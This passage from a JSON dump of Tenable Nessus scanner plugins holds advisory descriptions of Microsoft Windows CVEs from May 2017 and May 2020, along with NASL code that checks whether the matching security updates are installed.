convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0963)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-1048, CVE-2020-1070)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1051, CVE-2020-1174, CVE-2020-1175, CVE-2020-1176)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1062, CVE-2020-1092)\n\n - An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level. (CVE-2020-1066)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1078)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1064)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1153)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1054, CVE-2020-1143)\n\n - A remote code execution vulnerability exists in the way that Windows handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code with elevated permissions on a target system. (CVE-2020-1067)\n\n - An information disclosure vulnerability exists when the Windows Client Server Run-Time Subsystem (CSRSS) fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1116)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1112)\n\n - An elevation of privilege vulnerability exists when the Windows Printer Service improperly validates file paths while loading printer drivers. An authenticated attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges.\n (CVE-2020-1081)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Script Runtime handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1061)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. 
An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1114)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1154)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1035, CVE-2020-1058, CVE-2020-1060, CVE-2020-1093)", "cvss3": {"score": 9.9, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-05-12T00:00:00", "type": "nessus", "title": "KB4556854: Windows Server 2008 May 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0909", "CVE-2020-0963", "CVE-2020-1035", "CVE-2020-1048", "CVE-2020-1051", "CVE-2020-1054", "CVE-2020-1058", "CVE-2020-1060", "CVE-2020-1061", "CVE-2020-1062", "CVE-2020-1064", "CVE-2020-1066", "CVE-2020-1067", "CVE-2020-1070", "CVE-2020-1072", "CVE-2020-1078", "CVE-2020-1081", "CVE-2020-1092", "CVE-2020-1093", "CVE-2020-1108", "CVE-2020-1112", "CVE-2020-1113", "CVE-2020-1114", "CVE-2020-1116", "CVE-2020-1141", "CVE-2020-1143", "CVE-2020-1153", "CVE-2020-1154", "CVE-2020-1174", "CVE-2020-1175", "CVE-2020-1176"], "modified": "2022-05-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_MAY_4556860.NASL", "href": "https://www.tenable.com/plugins/nessus/136510", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n# The descriptive text and package checks in this plugin were 
\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136510);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\n \"CVE-2020-0909\",\n \"CVE-2020-0963\",\n \"CVE-2020-1035\",\n \"CVE-2020-1048\",\n \"CVE-2020-1051\",\n \"CVE-2020-1054\",\n \"CVE-2020-1058\",\n \"CVE-2020-1060\",\n \"CVE-2020-1061\",\n \"CVE-2020-1062\",\n \"CVE-2020-1064\",\n \"CVE-2020-1066\",\n \"CVE-2020-1067\",\n \"CVE-2020-1070\",\n \"CVE-2020-1072\",\n \"CVE-2020-1078\",\n \"CVE-2020-1081\",\n \"CVE-2020-1092\",\n \"CVE-2020-1093\",\n \"CVE-2020-1108\",\n \"CVE-2020-1112\",\n \"CVE-2020-1113\",\n \"CVE-2020-1114\",\n \"CVE-2020-1116\",\n \"CVE-2020-1141\",\n \"CVE-2020-1143\",\n \"CVE-2020-1153\",\n \"CVE-2020-1154\",\n \"CVE-2020-1174\",\n \"CVE-2020-1175\",\n \"CVE-2020-1176\"\n );\n script_xref(name:\"MSKB\", value:\"4556854\");\n script_xref(name:\"MSKB\", value:\"4556860\");\n script_xref(name:\"MSFT\", value:\"MS20-4556854\");\n script_xref(name:\"MSFT\", value:\"MS20-4556860\");\n script_xref(name:\"IAVA\", value:\"2020-A-0213-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4556854: Windows Server 2008 May 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4556854\nor cumulative update 4556860. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A denial of service vulnerability exists when .NET Core\n or .NET Framework improperly handles web requests. An\n attacker who successfully exploited this vulnerability\n could cause a denial of service against a .NET Core or\n .NET Framework web application. 
The vulnerability can be\n exploited remotely, without authentication. A remote\n unauthenticated attacker could exploit this\n vulnerability by issuing specially crafted requests to\n the .NET Core or .NET Framework application. The update\n addresses the vulnerability by correcting how the .NET\n Core or .NET Framework web application handles web\n requests. (CVE-2020-1108)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2020-1141)\n\n - A denial of service vulnerability exists when Hyper-V on\n a Windows Server fails to properly handle specially\n crafted network packets. (CVE-2020-0909)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1072)\n\n - A security feature bypass vulnerability exists in\n Microsoft Windows when the Task Scheduler service fails\n to properly verify client connections over RPC. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code as an administrator. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1113)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0963)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1048, CVE-2020-1070)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1051, CVE-2020-1174, CVE-2020-1175,\n CVE-2020-1176)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1062,\n CVE-2020-1092)\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. 
(CVE-2020-1066)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1078)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1064)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1153)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1054, CVE-2020-1143)\n\n - A remote code execution vulnerability exists in the way\n that Windows handles objects in memory. An attacker who\n successfully exploited the vulnerability could execute\n arbitrary code with elevated permissions on a target\n system. (CVE-2020-1067)\n\n - An information disclosure vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1116)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. 
(CVE-2020-1112)\n\n - An elevation of privilege vulnerability exists when the\n Windows Printer Service improperly validates file paths\n while loading printer drivers. An authenticated attacker\n who successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges.\n (CVE-2020-1081)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Script Runtime handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1061)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1114)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-1154)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2020-1035, CVE-2020-1058,\n CVE-2020-1060, CVE-2020-1093)\");\n # https://support.microsoft.com/en-us/help/4556854/windows-server-2008-update-kb4556854\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a3602bfa\");\n # https://support.microsoft.com/en-us/help/4556860/windows-server-2008-update-kb4556860\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cf75f677\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4556854 or Cumulative Update KB4556860.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1176\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1112\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-05';\nkbs = make_list(\n '4556860',\n '4556854'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'05_2020',\n bulletin:bulletin,\n rollup_kb_list:[4556860, 4556854])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:28", "description": "The remote Windows host is missing security update 4019213 or cumulative update 4019215. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. 
(CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. 
An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows 8.1 and Windows Server 2012 R2 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0190", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0228", "CVE-2017-0231", "CVE-2017-0238", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019215.NASL", "href": "https://www.tenable.com/plugins/nessus/100057", "sourceData": "#%NASL_MIN_LEVEL 
70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100057);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0171\",\n \"CVE-2017-0190\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0228\",\n \"CVE-2017-0231\",\n \"CVE-2017-0238\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98097,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019215\");\n script_xref(name:\"MSKB\", value:\"4019213\");\n script_xref(name:\"MSFT\", value:\"MS17-4019215\");\n script_xref(name:\"MSFT\", value:\"MS17-4019213\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is 
missing security update 4019213\nor cumulative update 4019215. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows\n DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. 
An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. 
Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain 